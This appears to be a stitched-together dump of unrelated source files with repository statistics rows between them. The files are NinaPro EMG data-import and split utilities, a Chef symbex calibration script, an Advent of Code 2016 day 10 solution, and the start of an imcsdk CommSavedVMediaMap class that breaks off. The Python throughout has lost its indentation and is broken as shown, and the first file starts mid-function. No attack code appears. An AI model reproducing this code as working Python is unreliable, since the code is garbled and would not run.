for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
return {'emg': emg,
'rep': rep,
'move': move,
'rep_regions': rep_regions,
'nb_capped': nb_capped
}
def import_db2_acc(folder_path, subject):
"""Function for extracting acceleronmeter data from raw NinaiPro files for DB2.
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-40 which subject's data to import
Returns:
array: Raw accceleronmeter from each electrode
"""
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
data = sio.loadmat(cur_path)
acc = np.squeeze(np.array(data['acc']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
data = sio.loadmat(cur_path)
acc = np.vstack((acc, np.array(data['acc'])))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
data = sio.loadmat(cur_path)
acc = np.vstack((acc, np.array(data['acc'])))
return acc
def gen_split_balanced(rep_ids, nb_test, base=None):
"""Create a balanced split for training and testing based on repetitions (all reps equally tested + trained on) .
Args:
rep_ids (array): Repetition identifiers to split
nb_test (int): The number of repetitions to be used for testing in each each split
base (array, optional): A specific test set to use (must be of length nb_test)
Returns:
Arrays: Training repetitions and corresponding test repetitions as 2D arrays [[set 1], [set 2] ..]
"""
nb_reps = rep_ids.shape[0]
nb_splits = nb_reps
train_reps = np.zeros((nb_splits, nb_reps - nb_test,), dtype=int)
test_reps = np.zeros((nb_splits, nb_test), dtype=int)
# Generate all possible combinations
all_combos = combinations(rep_ids, nb_test)
all_combos = np.fromiter(chain.from_iterable(all_combos), int)
all_combos = all_combos.reshape(-1, nb_test)
if base is not None:
test_reps[0, :] = base
all_combos = np.delete(all_combos, np.where(np.all(all_combos == base, axis=1))[0][0], axis=0)
cur_split = 1
else:
cur_split = 0
all_combos_copy = all_combos
reset_counter = 0
while cur_split < (nb_splits):
if reset_counter >= 10 or all_combos.shape[0] == 0:
all_combos = all_combos_copy
test_reps = np.zeros((nb_splits, nb_test), dtype=int)
if base is not None:
test_reps[0, :] = base
cur_split = 1
else:
cur_split = 0
reset_counter = 0
randomIndex = np.random.randint(0, all_combos.shape[0])
test_reps[cur_split, :] = all_combos[randomIndex, :]
all_combos = np.delete(all_combos, randomIndex, axis=0)
_, counts = np.unique(test_reps[:cur_split + 1], return_counts=True)
if max(counts) > nb_test:
test_reps[cur_split, :] = np.zeros((1, nb_test), dtype=int)
reset_counter += 1
continue
else:
cur_split += 1
reset_counter = 0
for i in range(nb_splits):
train_reps[i, :] = np.setdiff1d(rep_ids, test_reps[i, :])
return train_reps, test_reps
def gen_split_rand(rep_ids, nb_test, nb_splits, base=None):
"""Randomly generate nb_splits out of nb_reps training-test splits.
Args:
rep_ids (array): Repetition identifiers to split
nb_test (int): The number of repetitions to be used for testing in each each split
nb_splits (int): The number of splits to produce
base (array, optional): A specific test set to use (must be of length nb_test)
Returns:
Arrays: Training repetitions and corresponding test repetitions as 2D arrays [[set 1], [set 2] ..]
"""
nb_reps = rep_ids.shape[0]
all_combos = combinations(rep_ids, nb_test)
all_combos = np.fromiter(chain.from_iterable(all_combos), int)
all_combos = all_combos.reshape(-1, nb_test)
train_reps = np.zeros((nb_splits, nb_reps - nb_test,), dtype=int)
test_reps = np.zeros((nb_splits, nb_test), dtype=int)
cur_split = 0
if base is not None:
test_reps[0, :] = base
train_reps[0, :] = np.setdiff1d(rep_ids, test_reps[0, :])
all_combos = np.delete(all_combos, np.where(np.all(all_combos == base, axis=1))[0][0], axis=0)
cur_split = 1
for i in range(cur_split, nb_splits):
rand_idx = np.random.randint(all_combos.shape[0])
test_reps[i, :] = all_combos[rand_idx, :]
train_reps[i, :] = np.setdiff1d(rep_ids, test_reps[i, :])
all_combos = np.delete(all_combos, rand_idx, axis=0)
return train_reps, test_reps
def normalise_emg(emg, reps, train_reps, movements=None, which_moves=None):
"""Preprocess train+test data to mean 0, std 1 based on training data only.
Args:
emg (array): Raw EMG data
reps (array): Corresponding repetition information for each EMG observation
train_reps (array): Which repetitions are in the training set
movements (array, optional): Movement labels, required if using which_moves
which_moves (array, optional): Which movements to return - if None use all
Returns:
array: Rescaled EMG data
"""
train_targets = get_idxs(reps, train_reps)
# Keep only selected movement(s)
if which_moves is not None and movements is not None:
move_targets = get_idxs(movements[train_targets], which_moves)
train_targets = train_targets[move_targets]
scaler = StandardScaler(with_mean=True,
with_std=True,
copy=False).fit(emg[train_targets, :])
return scaler.transform(emg)
def get_windows(which_reps, window_len, window_inc, emg, movements, repetitons, which_moves=None, dtype=np.float32):
"""Get set of windows based on repetition and movement criteria and associated label + repetition data.
Args:
which_reps (array): Which repetitions to return
window_len (int): Desired window length
window_inc (int): Desired window increment
emg (array): EMG data (should be normalise beforehand)
movements (array): Movement labels
repetitons (array): Repetition labels
which_moves (array, optional): Which movements to return - if None use all
dtype (TYPE, optional): What precision to use for EMG data
Returns:
X_data (array): Windowed EMG data
Y_data (array): Movement label for each window
R_data (array): Repetition label for each window
"""
nb_obs = emg.shape[0]
nb_channels = emg.shape[1]
# All possible window end locations given an increment size
possible_targets = np.array(range(window_len - 1, nb_obs, window_inc))
targets = get_idxs(repetitons[possible_targets], which_reps)
# Re-adjust back to original range (for indexinging into rep/move)
targets = (window_len - 1) + targets * window_inc
# Keep only selected movement(s)
if which_moves is not None:
move_targets = get_idxs(movements[targets], which_moves)
targets = targets[move_targets]
X_data = np.zeros([targets.shape[0], window_len, nb_channels, 1],
dtype=dtype)
Y_data = np.zeros([targets.shape[0], ], dtype=np.int8)
R_data = np.zeros([targets.shape[0], ], dtype=np.int8)
for i, win_end in enumerate(targets):
win_start = win_end - (window_len - 1)
if movements[win_start] == movements[win_end]:
X_data[i, :, :, 0] = emg[win_start:win_end + 1, :] # Include end
Y_data[i] = movements[win_end]
R_data[i] = repetitons[win_end]
return X_data, Y_data, R_data
def to_categorical(y, nb_classes=None):
"""Convert a class vector (integers) to binary class matrix.
E.g. for use with categorical_crossentropy.
# Arguments
y: class vector to be converted into a matrix
(integers from 0 to nb_classes).
nb_classes: total number of classes.
# Returns
A binary matrix representation of the input.
Taken from:
https://github.com/fchollet/keras/blob/master/keras/utils/np_utils.py
v2.0.2 of Keras to remove unnecessary Keras dependency
"""
y = np.array(y, dtype='int').ravel()
if not nb_classes:
nb_classes = np.max(y) + 1
n = y.shape[0]
categorical = np.zeros((n, nb_classes))
categorical[np.arange(n), y] = 1
return categorical
def get_idxs(in_array, to_find):
"""Utility function for finding the positions of observations of one array in another an array.
Args:
in_array (array): Array in which to locate elements of to_find
to_find (array): Array of elements to locate in in_array
Returns:
TYPE: Indices of all elements of to_find in in_array
"""
targets = ([np.where(in_array == x) for x in to_find])
return np.squeeze(np.concatenate(targets, axis=1))
def db_info(db):
"""Return relevant info on databases 1 and2.
Args:
db (int): Which database to get info on (1 or 2 currently)
Returns:
Dict: Useful information on selected database
"""
if db == 1:
# General Info
nb_subjects = 27
nb_channels = 10
nb_moves = 53 # 52 + rest
nb_reps = 10
fs = 100
# Labels
rep_labels = np.array(range(1, nb_reps + 1))
move_labels = np.array(range(1, nb_moves + 1))
# Male - Female
female = np.array([6, 8, 10, 14, 15, 20, 22])
male = np.array([1, 2, 3, 4, 6, 8, 10, 11, 12, 15, 16, 17, 18, 20, 22, 23, 24, 25, 26, 27])
female_ind = np.array([5, 7, 9, 13, 14, 19, 21])
male_ind = np.array([0, 1, 2, 3, 5, 7, 9, 10, 11, 14, 15, 16, 17, 19, 21, 22, 23, 24, 25, 26])
# Handedness
left_handed = np.array([14, 16])
right_handed = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15,
17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27])
left_handed_ind = np.array([13, 15])
right_handed_ind = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,
14, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26])
# Other Info (synced)
ages = np.array([31, 27, 22, 27, 27, 22, 28, 27, 23, 30, 28, 25, 27,
29, 26, 29, 30, 29, 34, 26, 38, 35, 30, 26, 28, 40, 28])
heights = np.array([170, 170, 180, 183, 178, 163, 170, 164, 173, 160, 170, 185, 184,
155, 162, 167, 175, 178, 173, 165, 178, 168, 180, 180, 180, 179, 185])
weights = np.array([75, 62, 85, 95, 75, 48, 60, 54, 63, 60, 67, 80, 85,
54, 60, 67, 76, 68, 82, 54, 73, 65, 65, 65, 70, 66, 100])
elif db == 2:
# General Info
nb_subjects = 40
nb_channels = 12
nb_moves = 50 # 40 + 9 force movements + rest
nb_reps = 6
fs = 2000
# Labels
rep_labels = np.array(range(1, nb_reps + 1))
move_labels = np.array(range(1, nb_moves + 1))
# Male - Female
female = np.array([4, 11, 14, 18, 19, 20, 22, 28, 35, 36, 38])
male = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 12, 13, 15, 16, 17, 21,
23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34, 37, 39, 40])
female_ind = np.array([3, 10, 13, 17, 18, 19, 21, 27, 34, 35, 37])
male_ind = np.array([0, 1, 2, 4, 5, 6, 7, 8, 9, 11, 12, 14, 15, 16, 20,
22, 23, 24, 25, 26, 28, 29, 30, 31, 32, 33, 36, 38, 39])
# Handedness
left_handed = np.array([4, 13, 22, 25, 26])
right_handed = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20,
21, 23, 24, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40])
left_handed_ind = np.array([3, 12, 21, 24, 25])
right_handed_ind = np.array([0, 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19,
20, 22, 23, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39])
# Other Info (synced)
ages = np.array([29, 29, 31, 30, 25, 35, 27, 45, 23, 34, 32, 29, 30, 30, 30, 34, 29, 30, 31,
26, 32, 28, 25, 28, 31, 30, 29, 29, 27, 30, 29, 28, 25, 31, 24, 27, 34, 30, 31, 31])
heights = np.array([187, 183, 174, 154, 175, 172, 187, 173, 172, 173, 150, 184, 182, 173, 169, 173, 175, 169,
158, 155, 170, 162, 170, 170, 168, 186, 170, 160, 171, 173, 185, 173, 183, 192, 170, 155,
190, 163, 183, 173])
weights = np.array([75, 75, 69, 50, 70, 79, 92, 73, 63, 84, 54, 90, 70, 59, 58, 76, 70, 90, 52,
52, 75, 54, 66, 73, 70, 90, 65, 61, 64, 68, 98, 72, 71, 78, 52, 44, 105, 62, 96, 65])
else:
raise ValueError('db should be either 1 for database 1 or 2 for database 2')
return {'nb_subjects': nb_subjects,
'nb_channels': nb_channels,
'nb_moves': nb_moves,
'nb_reps': nb_reps,
'fs': fs,
'rep_labels': rep_labels,
'move_labels': move_labels,
'female': female,
'male': male,
'female_ind': female_ind,
'male_ind': male_ind,
'left_handed': left_handed,
'right_handed': right_handed,
'left_handed_ind': left_handed_ind,
'right_handed_ind': right_handed_ind,
'ages': ages,
'heights': heights,
'weights': weights,
}
def import_subject(folder_path, subject, db, rest_length_cap=999):
"""Function for extracting data from raw NinaiPro files for DB1.
Args:
folder_path (string): Path to folder containing raw mat files
subject (int): 1-27 which subject's data to import
rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement
db (int): Which database to get info on (1 or 2 currently)
Returns:
Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
demarked and the number of repetitions with capped off rest data
"""
if db == 1:
fs = 100
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E1.mat')
data = sio.loadmat(cur_path)
emg = np.squeeze(np.array(data['emg']))
rep = np.squeeze(np.array(data['rerepetition']))
move = np.squeeze(np.array(data['restimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E2.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus'])) # Fix for numbering
move_tmp[move_tmp != 0] += max(move)
move = np.append(move, move_tmp)
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E3.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus'])) # Fix for numbering
move_tmp[move_tmp != 0] += max(move)
move = np.append(move, move_tmp)
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
elif db == 2:
fs = 2000
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
data = sio.loadmat(cur_path)
emg = np.squeeze(np.array(data['emg']))
rep = np.squeeze(np.array(data['rerepetition']))
move = np.squeeze(np.array(data['restimulus']))
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
move_tmp = np.squeeze(np.array(data['restimulus']))
move = np.append(move, move_tmp) # Note no fix needed for this exercise
cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
data = sio.loadmat(cur_path)
emg = np.vstack((emg, np.array(data['emg'])))
data['repetition'][-1] = 0 # Fix for diffing
rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
# Movements number in non-logical pattern [0 1 2 4 6 8 9 16 32 40]
# Also note that for last file there is no 'rerepetition or 'restimulus'
data['stimulus'][-1] = 0 # Fix for diffing
data['stimulus'][np.where(data['stimulus'] == 1)] = 41
data['stimulus'][np.where(data['stimulus'] == 2)] = 42
data['stimulus'][np.where(data['stimulus'] == 4)] = 43
data['stimulus'][np.where(data['stimulus'] == 6)] = 44
data['stimulus'][np.where(data['stimulus'] == 8)] = 45
data['stimulus'][np.where(data['stimulus'] == 9)] = 46
data['stimulus'][np.where(data['stimulus'] == 16)] = 47
data['stimulus'][np.where(data['stimulus'] == 32)] = 48
data['stimulus'][np.where(data['stimulus'] == 40)] = 49
move_tmp = np.squeeze(np.array(data['stimulus']))
move = np.append(move, move_tmp)
move = move.astype('int8') # To minimise overhead
# Label repetitions using new block style: rest-move-rest regions
move_regions = np.where(np.diff(move))[0]
rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
nb_reps = int(round(move_regions.shape[0] / 2))
last_end_idx = int(round(move_regions[0] / 2))
nb_unique_reps = np.unique(rep).shape[0] - 1 # To account for 0 regions
nb_capped = 0
cur_rep = 1
rep = np.zeros([rep.shape[0], ], dtype=np.int8) # Reset rep array
for i in range(nb_reps - 1):
rep_regions[2 * i] = last_end_idx
midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
move_regions[2 * (i + 1)]) / 2)) + 1
trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
if trailing_rest_samps <= rest_length_cap * fs:
rep[last_end_idx:midpoint_idx] = cur_rep
last_end_idx = midpoint_idx
rep_regions[2 * i + 1] = midpoint_idx - 1
else:
rep_end_idx = (move_regions[2 * (i + 1) - 1] +
int(round(rest_length_cap * fs)))
rep[last_end_idx:rep_end_idx] = cur_rep
last_end_idx = ((move_regions[2 * (i + 1)] -
int(round(rest_length_cap * fs))))
rep_regions[2 * i + 1] = rep_end_idx - 1
nb_capped += 2
cur_rep += 1
if cur_rep > nb_unique_reps:
cur_rep = 1
end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
rep[last_end_idx:end_idx] = cur_rep
rep_regions[-2] = last_end_idx
rep_regions[-1] = end_idx - 1
else:
raise ValueError('db should be either 1 for database 1 or 2 for database 2')
return {'emg': emg,
'rep': rep,
'move': move,
'rep_regions': rep_regions,
'nb_capped': nb_capped
}
| 42.334768
| 119
| 0.568557
| 7,148
| 49,193
| 3.745803
| 0.064773
| 0.033987
| 0.02465
| 0.018301
| 0.825845
| 0.821923
| 0.788945
| 0.787339
| 0.78465
| 0.778711
| 0
| 0.083878
| 0.29742
| 49,193
| 1,161
| 120
| 42.371232
| 0.690817
| 0.183563
| 0
| 0.805128
| 0
| 0
| 0.065831
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021795
| false
| 0
| 0.016667
| 0
| 0.060256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fba5644ae7488d95bde127cddafbc5b955537ea9
| 1,477
|
py
|
Python
|
Chef/calibrate/default.py
|
dslab-epfl/chef-symbex-python
|
598d18ae2fe7f3af78489442e11b4505b001ddd3
|
[
"PSF-2.0"
] | 7
|
2015-05-20T11:45:39.000Z
|
2021-04-18T19:32:34.000Z
|
Chef/calibrate/default.py
|
dslab-epfl/chef-symbex-python
|
598d18ae2fe7f3af78489442e11b4505b001ddd3
|
[
"PSF-2.0"
] | null | null | null |
Chef/calibrate/default.py
|
dslab-epfl/chef-symbex-python
|
598d18ae2fe7f3af78489442e11b4505b001ddd3
|
[
"PSF-2.0"
] | 1
|
2015-08-04T14:34:28.000Z
|
2015-08-04T14:34:28.000Z
|
#!/usr/bin/env python
#
from chef import symbex
def calibrate():
x = 0
y = 1
symbex.calibrate(1, 0)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
x = x + y
y = x + y
x = x * 2
y = y / 2
symbex.calibrate(1, 5)
def main():
symbex.calibrate(0)
calibrate()
symbex.calibrate(2)
if __name__ == "__main__":
main()
| 15.547368
| 26
| 0.387949
| 271
| 1,477
| 2.084871
| 0.070111
| 0.106195
| 0.453097
| 0.106195
| 0.769912
| 0.769912
| 0.769912
| 0.769912
| 0.769912
| 0.769912
| 0
| 0.083969
| 0.46784
| 1,477
| 94
| 27
| 15.712766
| 0.63486
| 0.013541
| 0
| 0.872093
| 0
| 0
| 0.005498
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.011628
| 0
| 0.034884
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbc86afae91c13fecee89d212f7e0dbda819d2a7
| 5,956
|
py
|
Python
|
2016/day_10/python/day10.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
2016/day_10/python/day10.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | 2
|
2021-06-02T00:41:38.000Z
|
2021-11-30T10:05:29.000Z
|
2016/day_10/python/day10.py
|
autoreleasefool/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
from aoc import AOC
import re
aoc = AOC(year=2016, day=10)
data = aoc.load()
## Part 1
class Bot:
# Encapsulates bot instructions
def __init__(
self,
number,
gives_lower_to_output,
lower_to_number,
gives_higher_to_output,
higher_to_number,
chip_number,
):
self.number = number
self.on_lower_chip = (gives_lower_to_output, lower_to_number)
self.on_higher_chip = (gives_higher_to_output, higher_to_number)
self.chip_number = chip_number
# Handle when the bot is given a chip
def receive_chip(self, chip_number):
if self.chip_number is None:
self.chip_number = chip_number
return None
# Check for solution
if (self.chip_number == 61 and chip_number == 17) or (
self.chip_number == 17 and chip_number == 61
):
aoc.p1(self.number)
higher_chip = max(self.chip_number, chip_number)
lower_chip = min(self.chip_number, chip_number)
self.chip_number = None
return self.on_lower_chip + (lower_chip,) + self.on_higher_chip + (higher_chip,)
# Regular expressions to parse bot setup
re_instruction = re.compile(
r"bot (\d+) gives low to (bot|output) (\d+) and high to (bot|output) (\d+)"
)
re_initial_chip = re.compile(r"value (\d+) goes to bot (\d+)")
bots = {}
output_bins = {}
chips_to_pass = []
for line in data.lines():
if line[0] == "b": # Passing instructions
# Get instructions for bot to pass chips
instruction = re_instruction.match(line)
bot_number = int(instruction.group(1))
lower_to_output = instruction.group(2) == "output"
lower_goes_to = int(instruction.group(3))
higher_to_output = instruction.group(4) == "output"
higher_goes_to = int(instruction.group(5))
# Construct the bot with the given info
bots[bot_number] = Bot(
bot_number,
lower_to_output,
lower_goes_to,
higher_to_output,
higher_goes_to,
None,
)
else: # Initial chip
# Get the bot's starting chip
initial_chip = re_initial_chip.match(line)
start_chip = int(initial_chip.group(1))
bot_number = int(initial_chip.group(2))
chips_to_pass.append((False, bot_number, start_chip))
# Iterate over all chips being handled
while chips_to_pass:
to_pass = chips_to_pass.pop()
if to_pass[0]: # Pass to output bin
output_bin = to_pass[1]
chip = to_pass[2]
if output_bin in output_bins:
output_bins[output_bin].append(chip)
else:
output_bins[output_bin] = [chip]
else: # Pass to other bot
bot = to_pass[1]
chip = to_pass[2]
result = bots[bot].receive_chip(chip)
if result is not None:
# When bots have 2 chips, they give out their chips
chips_to_pass.append((result[0], result[1], result[2]))
chips_to_pass.append((result[3], result[4], result[5]))
## Part 2
# Encapsulates bot instructions
class Bot:
def __init__(
self,
number,
gives_lower_to_output,
lower_to_number,
gives_higher_to_output,
higher_to_number,
chip_number,
):
self.number = number
self.on_lower_chip = (gives_lower_to_output, lower_to_number)
self.on_higher_chip = (gives_higher_to_output, higher_to_number)
self.chip_number = chip_number
# Handle when the bot is given a chip
def receive_chip(self, chip_number):
if self.chip_number is None:
self.chip_number = chip_number
return None
higher_chip = max(self.chip_number, chip_number)
lower_chip = min(self.chip_number, chip_number)
self.chip_number = None
return self.on_lower_chip + (lower_chip,) + self.on_higher_chip + (higher_chip,)
# Regular expressions to parse bot setup
re_instruction = re.compile(
"bot (\\d+) gives low to (bot|output) (\\d+) and high to (bot|output) (\\d+)"
)
re_initial_chip = re.compile("value (\\d+) goes to bot (\\d+)")
bots = {}
output_bins = {}
chips_to_pass = []
for line in data.lines():
if line[0] == "b": # Passing instructions
# Get instructions for bot to pass chips
instruction = re_instruction.match(line)
bot_number = int(instruction.group(1))
lower_to_output = instruction.group(2) == "output"
lower_goes_to = int(instruction.group(3))
higher_to_output = instruction.group(4) == "output"
higher_goes_to = int(instruction.group(5))
# Construct the bot with the given info
bots[bot_number] = Bot(
bot_number,
lower_to_output,
lower_goes_to,
higher_to_output,
higher_goes_to,
None,
)
else: # Initial chip
# Get the bot's starting chip
initial_chip = re_initial_chip.match(line)
start_chip = int(initial_chip.group(1))
bot_number = int(initial_chip.group(2))
chips_to_pass.append((False, bot_number, start_chip))
# Iterate over all chips being handled
while chips_to_pass:
to_pass = chips_to_pass.pop()
if to_pass[0]: # Pass to output bin
output_bin = to_pass[1]
chip = to_pass[2]
if output_bin in output_bins:
output_bins[output_bin].append(chip)
else:
output_bins[output_bin] = [chip]
else: # Pass to other bot
bot = to_pass[1]
chip = to_pass[2]
result = bots[bot].receive_chip(chip)
if result is not None:
# When bots have 2 chips, they give out their chips
chips_to_pass.append((result[0], result[1], result[2]))
chips_to_pass.append((result[3], result[4], result[5]))
aoc.p2(output_bins[0][0] * output_bins[1][0] * output_bins[2][0])
| 30.860104
| 88
| 0.61904
| 826
| 5,956
| 4.193705
| 0.125908
| 0.080831
| 0.064665
| 0.04157
| 0.920901
| 0.920901
| 0.920901
| 0.920901
| 0.920901
| 0.920901
| 0
| 0.014964
| 0.281901
| 5,956
| 192
| 89
| 31.020833
| 0.79495
| 0.128946
| 0
| 0.886525
| 0
| 0.014184
| 0.045173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028369
| false
| 0.156028
| 0.014184
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
8389b4cfa0fcd43b4556aed089ff2090e1226ba0
| 7,390
|
py
|
Python
|
imcsdk/mometa/comm/CommSavedVMediaMap.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/comm/CommSavedVMediaMap.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/comm/CommSavedVMediaMap.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | 1
|
2019-11-10T18:42:04.000Z
|
2019-11-10T18:42:04.000Z
|
"""This module contains the general information for CommSavedVMediaMap ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class CommSavedVMediaMapConsts:
ADMIN_ACTION_DELETE_VOLUME = "delete-volume"
ADMIN_ACTION_REMAP_VOLUME = "remap-volume"
DRIVE_TYPE_CD = "cd"
DRIVE_TYPE_FLOPPY = "floppy"
MAP_CIFS = "cifs"
MAP_NFS = "nfs"
MAP_WWW = "www"
class CommSavedVMediaMap(ManagedObject):
"""This is CommSavedVMediaMap class."""
consts = CommSavedVMediaMapConsts()
naming_props = set([u'volumeName'])
mo_meta = {
"classic": MoMeta("CommSavedVMediaMap", "commSavedVMediaMap", "saved-vmmap-[volume_name]", VersionMeta.Version301c, "InputOutput", 0x3f, [], ["admin", "read-only", "user"], [u'commVMedia'], [], ["Get", "Remove", "Set"]),
"modular": MoMeta("CommSavedVMediaMap", "commSavedVMediaMap", "saved-vmmap-[volume_name]", VersionMeta.Version301c, "InputOutput", 0x3f, [], ["admin", "read-only", "user"], [u'commVMedia'], [], ["Get", "Remove", "Set"])
}
prop_meta = {
"classic": {
